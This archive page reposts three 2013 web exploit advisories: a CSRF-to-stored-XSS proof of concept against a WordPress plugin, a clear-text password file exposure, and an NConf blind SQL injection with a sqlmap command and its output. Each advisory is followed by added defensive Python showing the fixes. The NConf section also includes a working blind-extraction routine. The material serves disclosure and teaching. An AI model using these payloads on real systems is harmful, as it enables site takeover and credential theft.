Archive for 22 January 2013

WordPress Developer Formatter CSRF Vulnerability

CSRF and XSS vulnerabilities have been found in WordPress Developer Formatter.
Where the flaw occurs and how it is exploited are explained as follows:

# Exploit Title: WordPress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: | Website:
# Software Link:
# Vendor:
# Tested on: CentOS 5  
# Version: WordPress Version 3.5, Should work on all versions.

[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read:
// CSRF Exploit:
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/>
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>" />
<input name="showtools" style="display:none;" type="checkbox" checked/>
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;">
body {
  background-image: url('javascript:alert("XSS");') !important;
}
</textarea>
</form>
</body>
[#] copyclipboartext & devfmtcss are both vulnerable to persistent XSS, which could lead to cookie stealing,
    malware distribution or even a defacement.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions.	
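As an added example, not code from the plugin or from the advisory's author, here are the two controls whose absence the PoC above relies on, written in framework-free Python so it runs stand-alone: a nonce bound to the action and user that the handler checks before saving anything (what WordPress provides as wp_nonce_field()/check_admin_referer()), and HTML-escaping of the stored option when it is echoed back, which neutralizes the `</textarea><script>` breakout (what esc_textarea()/esc_attr() do). The handler, the secret, the tick length and the assumption that copyclipboartext is echoed inside a textarea are mine, not the plugin's.

```python
"""Added example, not the plugin's code: a nonce-checked settings handler and
escaped output, the two controls the PoC above exploits the absence of, in
framework-free Python. WordPress ships these as wp_nonce_field()/
check_admin_referer() and esc_attr()/esc_textarea(); names, secret and tick
length here are assumptions."""
import hashlib
import hmac
import html
import time

SECRET_KEY = b"constructed-per-site-secret"   # assumption: stands in for the site's salts
TICK_SECONDS = 12 * 3600                      # a nonce is accepted for this tick and the previous one


def make_nonce(action, user_id, now=None):
    """HMAC over (time window, action, user): unguessable without the secret,
    and a page on another origin cannot read it out of the admin page either."""
    now = time.time() if now is None else now
    tick = int(now // TICK_SECONDS)
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, action, user_id, now=None):
    now = time.time() if now is None else now
    for age in (0, TICK_SECONDS):             # current tick, then the one before
        if hmac.compare_digest(make_nonce(action, user_id, now - age), nonce or ""):
            return True
    return False


def handle_settings_post(form, user_id, stored):
    """Hypothetical options handler for the devformatter page. Without the
    nonce the auto-submitting form in the PoC would be accepted as the admin."""
    if not verify_nonce(form.get("_wpnonce"), "devformatter-options", user_id):
        raise PermissionError("missing or invalid nonce")
    stored["copyclipboartext"] = form.get("copyclipboartext", "")
    stored["devfmtcss"] = form.get("devfmtcss", "")
    return stored


def render_textarea_vulnerable(value):
    # the stored option echoed raw: a '</textarea>' inside it closes the element
    # and whatever follows is parsed as markup, which is the persistent XSS
    return f'<textarea name="copyclipboartext">{value}</textarea>'


def render_textarea_escaped(value):
    # '<', '>', '&' and quotes become entities, so the browser shows them as text
    return f'<textarea name="copyclipboartext">{html.escape(value, quote=True)}</textarea>'


if __name__ == "__main__":
    payload = "</textarea><script>alert(/xss/)</script>"   # the PoC's value after entity decoding
    print(render_textarea_vulnerable(payload))
    print(render_textarea_escaped(payload))
    options = {}
    try:                                       # the cross-site POST carries no nonce
        handle_settings_post({"copyclipboartext": payload}, user_id=1, stored=options)
    except PermissionError as err:
        print("rejected:", err)
    form = {"_wpnonce": make_nonce("devformatter-options", 1), "copyclipboartext": payload}
    print("accepted:", handle_settings_post(form, user_id=1, stored=options))
```

The nonce only helps because the attacker's page cannot read the admin page to harvest it (same-origin policy); it is not a substitute for the capability check (current_user_can() in WordPress), which the handler should perform as well. Escaping on output is what stops the stored XSS regardless of how the value got into the database.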

Adult Webmaster Script Password Disclosure Vulnerability

An Adult Webmaster Script password disclosure vulnerability has been found; the exploit for it is given below.

# Exploit Title: Adult Webmaster Script Admin Password Disclosure
# Category: webapps
# Software description: a website script for webmasters promoting adult companies through referrals
# Date: 21-1-2013
# Exploit Author: Dshellnoi Unix 
# Vendor Homepage:
# Software Link:

#-----------------------------VULNERABILITY DESCRIPTION------------------------------------#
The failure comes from saving passwords in a text file with the PHP fwrite function,
which can then be read via a URL.

# Thanks to: Luisfer, Ivan Sanchez, Juan Carlos Garcia
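As an added example, not the Adult Webmaster Script's code (the advisory names neither the file nor its layout), here is the mistake it describes in generic form beside a corrected version, plus the check a tester would run: an fwrite()-style append of user:password in clear into the served tree, storage of a salted hash outside the document root with owner-only permissions, and a scan of a web root that reports credential-looking files by the URL path a client would request. The file names, the record layout and the line pattern are assumptions.

```python
"""Added example, not the Adult Webmaster Script's code: credentials written in
clear with an fwrite()-style append into the served tree (the bug the advisory
describes), a hardened variant, and a scan that reports credential-looking
files a client could fetch by URL. File names, the record layout and the
line pattern are assumptions."""
import hashlib
import os
import re
import secrets
import tempfile

ROUNDS = 200_000  # PBKDF2 iterations; assumption, tune to the host


def save_insecure(docroot, user, password):
    # what the advisory describes: user:password appended in clear, under the web root
    path = os.path.join(docroot, "admin", "passwords.txt")   # hypothetical file name
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "a", encoding="utf-8") as f:
        f.write(f"{user}:{password}\n")
    return path


def save_secure(store_dir, user, password):
    # outside the document root, owner-only permissions, salted PBKDF2 hash
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    path = os.path.join(store_dir, "users.db")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
    with os.fdopen(fd, "a", encoding="utf-8") as f:
        f.write(f"{user}:{salt.hex()}:{digest.hex()}\n")
    return path


def verify_secure(store_dir, user, password):
    """Constant-time check against the stored hash; the clear password is never on disk."""
    with open(os.path.join(store_dir, "users.db"), encoding="utf-8") as f:
        for line in f:
            name, salt_hex, digest_hex = line.rstrip("\n").split(":")
            if name == user:
                digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                             bytes.fromhex(salt_hex), ROUNDS)
                return secrets.compare_digest(digest.hex(), digest_hex)
    return False


# "something:something" with no whitespace: the shape of a clear-text credential record
CRED_LINE = re.compile(r"^[\w.@-]{1,64}:[^\s:]{4,}$")


def find_exposed_credentials(docroot, extensions=(".txt", ".log", ".bak", ".csv")):
    """Walk the served tree and return (URL path, matching line count) for files
    whose lines look like user:secret, i.e. what a GET to that path would return."""
    hits = []
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="ignore") as f:
                    count = sum(1 for line in f if CRED_LINE.match(line.strip()))
            except OSError:
                continue
            if count:
                url_path = "/" + os.path.relpath(full, docroot).replace(os.sep, "/")
                hits.append((url_path, count))
    return sorted(hits)


def demo():
    """Run both variants in a scratch tree and report what the scan and a login see."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "htdocs")    # served
        store = os.path.join(tmp, "private")     # not served
        os.makedirs(docroot)
        os.makedirs(store, mode=0o700)
        save_insecure(docroot, "admin", "Hunter2!")   # constructed credentials
        save_secure(store, "admin", "Hunter2!")
        return {
            "exposed_in_docroot": find_exposed_credentials(docroot),
            "exposed_in_store": find_exposed_credentials(store),
            "login_ok": verify_secure(store, "admin", "Hunter2!"),
            "login_wrong": verify_secure(store, "admin", "wrong"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Moving the file out of the document root is the part that closes the URL read; hashing is what limits the damage if a copy leaks anyway. On a real engagement the scan's extension list is a starting point, not a complete one.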

NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection

An NConf 1.3 (detail.php, detail_admin_items.php, id parameter) SQL injection vulnerability has been found; where the flaw occurs, the exploit and its usage are as follows:

# Exploit Title: nconf detail.php, detail_admin_items.php blind injection
# Date: 2013/1/20
# Exploit Author: haidao
# Software Link:
# Version:    nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos)  PHP/5.3.3

I found two files we can inject:

The injection point in both is 'id'; you can inject it with sqlmap. Of course you must have an account to log in.

Inject like this:
python sqlmap.py -u ""  -p id  --cookie="XXX"  --dbs

[*] starting at 23:45:22

[23:45:22] [INFO] resuming back-end DBMS 'mysql' 
[23:45:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6429=6429

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
[23:45:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[23:45:22] [INFO] fetching database names
[23:45:22] [INFO] fetching number of databases
[23:45:22] [INFO] resumed: 3
[23:45:22] [INFO] resumed: information_schema
[23:45:22] [INFO] resumed: nconf
[23:45:22] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] nconf
[*] test
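As an added example, not NConf's code and not sqlmap, the following reproduces what the session above relies on in an in-memory SQLite stand-in: a detail.php-style lookup that pastes `id` into the query text, the same lookup with placeholder binding, and the boolean-based blind extraction that `--dbs` automates, using the `1 AND 6429=6429` / `1 AND 6429=6430` pair as the true/false oracle. Table and column names are assumptions; `SUBSTR`/`UNICODE` are SQLite's functions (MySQL would use `SUBSTRING`/`ORD`), and the time-based variant sqlmap also found is the same idea with a delay rather than page content as the signal.

```python
"""Added example, not NConf's code and not sqlmap: an in-memory SQLite stand-in
for a detail.php-style page whose 'id' is pasted into the query, a parameterized
version of the same lookup, and the boolean-based blind extraction that sqlmap
automated in the session above. Table and column names are assumptions;
SUBSTR/UNICODE are SQLite's, MySQL would use SUBSTRING/ORD."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);   -- constructed data
    INSERT INTO items VALUES (1, 'host-one'), (2, 'host-two');
    CREATE TABLE users (name TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
""")


def detail_vulnerable(item_id):
    """Mirrors the bug class: the parameter is concatenated into the SQL text."""
    row = conn.execute(f"SELECT name FROM items WHERE id={item_id}").fetchone()
    return row[0] if row else None


def detail_fixed(item_id):
    """Placeholder binding: 'id' is always a value, never SQL."""
    row = conn.execute("SELECT name FROM items WHERE id=?", (item_id,)).fetchone()
    return row[0] if row else None


def oracle(page, condition):
    """True when the page behaves as for id=1: the 'boolean-based blind' signal."""
    try:
        return page(f"1 AND ({condition})") == page("1")
    except sqlite3.Error:
        return False


def blind_extract(page, subquery, max_len=32):
    """Recover the result of a scalar subquery one character at a time with a
    binary search over code points, as sqlmap does for --dbs / --dump."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                       # smallest code point not less than the real one
            mid = (lo + hi) // 2
            cond = f"COALESCE(UNICODE(SUBSTR(({subquery}),{pos},1)),0) > {mid}"
            if oracle(page, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                          # SUBSTR past the end is '', so the value ran out
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("injectable:", oracle(detail_vulnerable, "6429=6429")
          and not oracle(detail_vulnerable, "6429=6430"))
    print("patched   :", oracle(detail_fixed, "6429=6429")
          and not oracle(detail_fixed, "6429=6430"))
    print("dumped    :", blind_extract(detail_vulnerable,
                                       "SELECT password FROM users WHERE name='admin'"))
```

With binding, `detail_fixed("1 AND 6429=6429")` returns no row at all, so the oracle has nothing to distinguish; that is the whole fix, and it costs nothing at the call site. The extractor needs seven requests per character, which is why sqlmap's run is so chatty against a real target.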